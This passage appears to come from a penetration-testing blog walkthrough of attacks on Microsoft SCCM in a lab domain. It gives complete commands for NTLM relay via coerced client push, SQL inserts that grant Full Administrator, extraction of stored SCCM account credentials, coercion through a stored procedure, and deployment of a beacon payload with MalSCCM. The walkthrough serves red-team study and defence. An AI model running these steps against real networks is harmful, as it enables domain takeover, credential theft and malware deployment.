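# ntlmrelayx's SOCKS server listens on 127.0.0.1:1080 by default
[ProxyList]
socks4 127.0.0.1 1080
```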

Lateral Movement – Site Takeover

Via SQL

As described by Chris Thompson of SpecterOps, the computer account for the Primary Site server is required to be a local admin on the SQL server and Management Point computers. Chris describes this in far better detail than I will be able to, but in effect this means that we can coerce NTLM authentication from the Primary Site’s computer account and relay it onto the SQL Server which supports the SCCM site. From this point, you could then grant yourself the Full Administrator SCCM role using SQL commands – giving yourself full access to any system managed by the Site. Gabriel covers this at 1:22:54.

This does require Extended Protection to be disabled in MSSQL. If it is enabled, then we can always relay via SMB onto the Management Point or MSSQL servers instead, provided SMB Signing is disabled. This process is semi-automated with sccmhunter using the mssql module.

In order to be able to execute SQL queries against the site’s SQL server, we will coerce authentication from the site server’s machine account and relay it to the mssql service on the SQL server. This attack works due to a requirement for the site server’s machine account to have local admin rights over the SQL server during the setup of SCCM. See the first image in Chris’s blog as proof.

In the diagram below, the ‘site takeover’ section is only steps 1-4, steps 5-9 detail the exploitation steps if a package is deployed via SharpSCCM (as shown later on).

To start, let’s check if we have permission to run a command on server1.sccmlab.local. As expected, we don’t have permission.

Let’s stand up ntlmrelayx to capture incoming NTLM authentication requests. We will use SOCKS mode to keep the connection open, allowing us to use proxychains to run SQL queries against the DB (10.10.0.102).

python ntlmrelayx.py -smb2support -ip 10.10.0.161 -t mssql://10.10.0.102 -socks

When this is stood up, we can trigger a Client Push from our infected user account. Don’t forget to set the target (-t) to the IP address of our machine running ntlmrelayx!

SharpSCCM.exe invoke client-push -mp sccm.sccmlab.local -sc S01 -t 10.10.0.161

ntlmrelayx catches the incoming authentication; notice that SCCM$ manages to authenticate against the mssql service on the penultimate line.

Whilst keeping ntlmrelayx open, let’s open another terminal and proxy our SQL queries through to the SQL server. Note that the account name is wrapped in quotes due to the $ sign, and that we are using -windows-auth. When we connect, we can enter whatever we want for the password.

proxychains python3 mssqlclient.py "SCCMLAB/SCCM$"@10.10.0.102 -windows-auth

We will now run sccmhunter.py mssql to generate the SQL commands to run. Here, we will grant joe.bloggs SCCM admin rights on site S01 with the arguments -tu joe.bloggs -sc S01:

python sccmhunter.py mssql -d sccmlab.local -dc-ip 10.10.0.100 -u joe.bloggs -p a -tu joe.bloggs -sc S01

Resulting in a few SQL statements being generated:

use CM_S01

INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x0105000000000005150000003B0AC320F4F69FBD8B3F26E644060000,'SCCMLAB\joe.bloggs',0,0,'','','','','S01');

SELECT AdminID,LogonName FROM RBAC_Admins;
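As an aside, the AdminSID blob in the INSERT above is just the binary encoding of the target user’s string SID (the same joe.bloggs SID used elsewhere in this lab). A minimal Python sketch of that conversion:

```python
import struct

def sid_to_bytes(sid: str) -> bytes:
    """Encode a string SID (S-1-5-...) into the binary layout SQL expects:
    revision byte, sub-authority count, 48-bit authority (big-endian),
    then each sub-authority as a little-endian DWORD."""
    parts = sid.split("-")
    assert parts[0].upper() == "S", "SIDs start with S-"
    revision, authority = int(parts[1]), int(parts[2])
    subauths = [int(p) for p in parts[3:]]
    blob = struct.pack("BB", revision, len(subauths))
    blob += authority.to_bytes(6, "big")
    for sub in subauths:
        blob += struct.pack("<I", sub)
    return blob

# joe.bloggs' SID produces the exact AdminSID value in the INSERT above.
print("0x" + sid_to_bytes("S-1-5-21-549653051-3181377268-3861266315-1604").hex().upper())
# → 0x0105000000000005150000003B0AC320F4F69FBD8B3F26E644060000
```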

Let’s run the first set of commands, which will add joe.bloggs into the RBAC_Admins table. We can then prove joe.bloggs has been given AdminID = 16777218 by running a SELECT query on the RBAC_Admins table.

Let’s add this AdminID into our sccmhunter command to get the final queries, which grant permissions to the joe.bloggs account.

INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (16777218,'SMS0001R','SMS00ALL','29');

INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (16777218,'SMS0001R','SMS00001','1');

INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (16777218,'SMS0001R','SMS00004','1');

And we can confirm we have added our permissions in:

We can also confirm this by going to Administration -> Security -> Administrative Users within MCM.

Lets run our command again to execute calc.exe on server1.sccmlab.local, this time we have success!

Via AdminService API

Hot off the press!! Garrett Foster recently released a blog post detailing how we can leverage the AdminService API to take over an SCCM site. The AdminService API is used to perform SCCM administrative tasks, and underpins the admin and pivot modules in sccmhunter – which Garrett wrote.

Using their PR to impacket, we will run ntlmrelayx. We can obtain our user’s SID using SharpSCCM.exe local user-sid.

ntlmrelayx.py -t https://sccm.sccmlab.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname "SCCMLAB\joe.bloggs" --displayname "SCCMLAB\joe.bloggs" --objectsid S-1-5-21-549653051-3181377268-3861266315-1604

We will again coerce authentication via Client Push, but we could use PetitPotam or another technique of your choosing.

SharpSCCM.exe invoke client-push -mp sccm.sccmlab.local -sc S01 -t 10.10.0.161

Unfortunately, this attack wouldn’t work for me, as my SMS Provider is on the same server as the site server itself; the two need to be separate for this attack to work, as shown by my site’s information below:

This can also be done via pass-the-hash, for example if we can perform ADCS abuse against a user with privileges over the WMI interface. This will be merged into sccmhunter at some point in the future, but can currently be performed with smsadmin.

Lateral Movement – NTLM Relay To Other SCCM Clients

If a Client Push account has not been defined in an SCCM environment, the machine account of the SCCM server will be used to push the SCCM client onto endpoints. The SCCM site computer account will therefore have local admin rights across the estate. This means that if:

  • We can coerce authentication from the push account (i.e. PetitPotam)
  • SMB Signing is disabled (i.e. we can relay)

Then we can relay this authentication onto any SCCM client and gain admin access to it. This should be possible even after the two patches (KB15599094 and KB15498768) are installed. Gabriel has a great demo of this in his talk at 1:19:07. Below we use SMBExec as an example, but this could be any tool which can be used with relayed NTLM authentication and proxychains.

If we now trigger a client push with SharpSCCM, we only get an authentication request from the SCCM$ account, not the sccmclientpush account.

SharpSCCM.exe invoke client-push -mp sccm.sccmlab.local -sc S01 -t 10.10.0.161

Because we configured a dedicated Client Push account earlier, this attack won’t work, as the SCCM$ account does not have local admin rights on the SCCM-managed devices. In another network which has never used a dedicated Client Push account, we would expect to see the computer account as a local admin below.

SQL DB Admin To Primary Site DB

Obtain SCCM User Creds

If we have admin access to the SQL DB which supports the Primary Site, we can read out the encrypted credentials of SCCM users from the SC_UserAccount table. Thanks (again) to XPN, we can use his PoC sccmdecryptpoc.cs to decrypt the contents, with his Twitter thread covering the process in more detail.

This requires admin access to a server holding the “Microsoft Systems Management Server” CSP for it to work. In practice, I believe this means we need to perform the decryption on an SCCM site server – though this doesn’t stop us from obtaining the encrypted value!

Again, we will assume we can coerce authentication and relay it onto the SQL server, though this attack can equally be performed if we have direct access to the SQL database itself. Let’s do our standard setup for ntlmrelayx.

python ntlmrelayx.py -smb2support -ip 10.10.0.161 -t mssql://10.10.0.102 -socks

And then coerce authentication using Client Push

SharpSCCM.exe invoke client-push -mp sccm.sccmlab.local -sc S01 -t 10.10.0.161

We can then run SQL commands on the SQL server using proxychains, like we did for the Site Takeover attacks.

proxychains python3 mssqlclient.py "SCCMLAB/SCCM$"@10.10.0.102 -windows-auth
USE CM_S01
SELECT UserName,Password FROM SC_UserAccount

We can then use XPN’s SCCMDecryptPoc tool to decrypt this.

Alternatively, we can use Mimikatz to do this, so long as we have a valid connection string to the DB, via the misc::sccm /connectionstring:XYZ command. This comes with the associated fun of using Mimikatz.

Dumping Task Sequences

We can dump Task Sequences to look for creds and other interesting data. Several tables (vSMS_TaskSequencePackage, vSMS_TaskSequencePackageEx and TS_TaskSequence) contain a Sequence column which holds the XML for the Task Sequence. We can find the details with the following SQL query:

SELECT TS_ID, Name, Sequence FROM vSMS_TaskSequencePackage

Unfortunately, SCCM doesn’t just give us the plaintext XML, with the rows showing the characteristic 0x38393133303030 value. We can decrypt this using DeObfuscateSecretString by Mayyhem, after converting it from hexadecimal.
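As a quick sanity check, that characteristic value is just hex-encoded ASCII. Decoding it (after stripping the 0x prefix) shows the marker at the start of the obfuscated data:

```python
# Characteristic prefix seen in the Sequence column, as noted above.
marker = "0x38393133303030"

# Strip the "0x" and hex-decode - the bytes are plain ASCII digits.
decoded = bytes.fromhex(marker[2:]).decode("ascii")
print(decoded)  # → 8913000
```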

Whilst we are likely to have a faster route to domain compromise via a ‘Full Administrator’ SCCM user, Task Sequences might contain other credentials of interest which aren’t AD-based – for example, credentials for cloud accounts.

Coerce NTLM Authentication

Thanks to a tweet by Mayyhem, we can use the sp_CP_GenerateCCRByName stored procedure to coerce the site client installation account to authenticate to the ADMIN$ share on a machine of our choosing. We can also specify an IP address rather than relying on SCCM-managed hosts.

USE CM_S01
GO

DECLARE @return_value int 

EXEC    @return_value = [dbo].[sp_CP_GenerateCCRByName] 
        @MachineNameList = N'10.10.0.161', 
        @SiteCode = N'S01', 
        @bForced = 0, 
        @bForceReinstall = 0

SELECT 'Return Value' = @return_value

GO

Primary Site Admin

With ‘Full Administrator’ access to a Primary Site, we can perform a number of powerful attacks against clients managed by the site. This is by design, as a primary site is a Tier 0 asset.

The most basic attack would be to create a group of users we want to target, then deploy an implant to all of their machines using the SCCM GUI. That is quite lame, so we will instead use commands we can execute from the command line.

At this point, we will assume we have performed a site takeover attack (via AdminService API or SQL).

Recon – Perform Recon Queries

Using sccmhunter, we can run recon commands through the AdminService API to gather data while avoiding noisier methods. For example, the admin and pivot modules allow for collection of various forms of recon data.

I encountered an unsupported hash type md4 error whilst running sccmhunter. As always, the solution was found on StackOverflow – we need to update the requests-ntlm library with the following command:

python3 -m pip install -U requests-ntlm

To start with, let’s run the admin module with the following command:

python sccmhunter.py admin -ip 10.10.0.101 -u "SCCMLAB\joe.bloggs" -p "a" -debug

After collection, we are dropped into a CLI where we can run further queries on the data. We can use the help command to find out the available features.

For example, we can find details on all the applications:

Or all of the collections:

To take this to the next step, we can use the pivot module to run further commands. For now it’s a PoC within sccmhunter, but no doubt we will see it developed further in the future.

We can use the help command within the interface to see the commands available to us:

For example, targeting server2.sccmlab.local, which has a device ID of 16777220:

Lateral Movement – Deploy an application

There are several ways of doing this; for this example we will use MalSCCM. To perform the attack, we will create a group of computer objects and then deploy a payload to them. We could create user groups instead, but because MalSCCM has to guess the most likely computer object for a given user, it is safer to set the computers manually. Whilst using the tool from an ‘infected’ client device, I found I had to specify the SCCM server with each command to avoid errors.

To create our group, we will run:

MalSCCM.exe group /create /groupname:1337TargetGroup /grouptype:device /server:sccm.sccmlab.local

We will then set our target device. I had to use the hostname in all caps rather than an FQDN for this to work – it likely needs to match the name shown in the MCM portal, which appears to be the hostname in uppercase.

MalSCCM.exe group /addhost /groupname:1337TargetGroup /host:SERVER1 /server:sccm.sccmlab.local

As mentioned by Nettitude in their post on MalSCCM, in order to deploy an application, we need to host the application on a share which the computer account is able to access. For this example we will pretend that we have found an open share.

Lets now create our malicious application, with the following command:

MalSCCM.exe app /create /name:OhDearOhDear /uncpath:"\\SCCM\Open Share\beacon.exe" /server:sccm.sccmlab.local

Now lets deploy this application to the group we created earlier.

MalSCCM.exe app /deploy /name:OhDearOhDear /groupname:1337TargetGroup /assignmentname:ItsRainingShellz /server:sccm.sccmlab.local

And finally, we can optionally coerce the targets in the group to check in, speeding up the deployment time.

MalSCCM.exe checkin /groupname:1337TargetGroup /server:sccm.sccmlab.local

After hours of banging my head against a wall, I couldn’t get this to work, but here is what I should have seen:

We can do this all in one go using SharpSCCM’s exec command: using the -i or -n parameters, we can deploy our payload/executable to a collection of users.

Lateral Movement – Arbitrary NTLM Coercion

For this attack, we add all of our targets into a group, then create an application which has its UNC path set to one we can control. This application is then deployed and the targets will attempt to authenticate to our share. From this point we can relay the authentication onto a service of our choice. For this example, I will just capture the authentication using ntlmrelayx to prove that it is a viable attack vector.

The command given in Chris’s original writeup has since changed, with the -mp and -sc arguments now required. Note that the targeted device (-d) has to match the hostname. In our case, we had to use SERVER1 rather than server1.sccmlab.local.

SharpSCCM.exe exec -mp sccm.sccmlab.local -sc S01 -d SERVER1 -r 10.10.0.161

As usual, we will set up ntlmrelayx to listen for inbound SMB connections:

python ntlmrelayx.py -smb2support -ip 10.10.0.161 -socks

And we get inbound authentication requests after SharpSCCM deploys an application. We could relay this onward to a number of services.

Conclusion

And there we go, a whole range of ways of compromising SCCM! Undoubtedly there will be more attack paths and research being released over the coming months, so it is well worth conducting a review of attack paths into and within your own SCCM estate. Using BloodHound is a great way of doing this.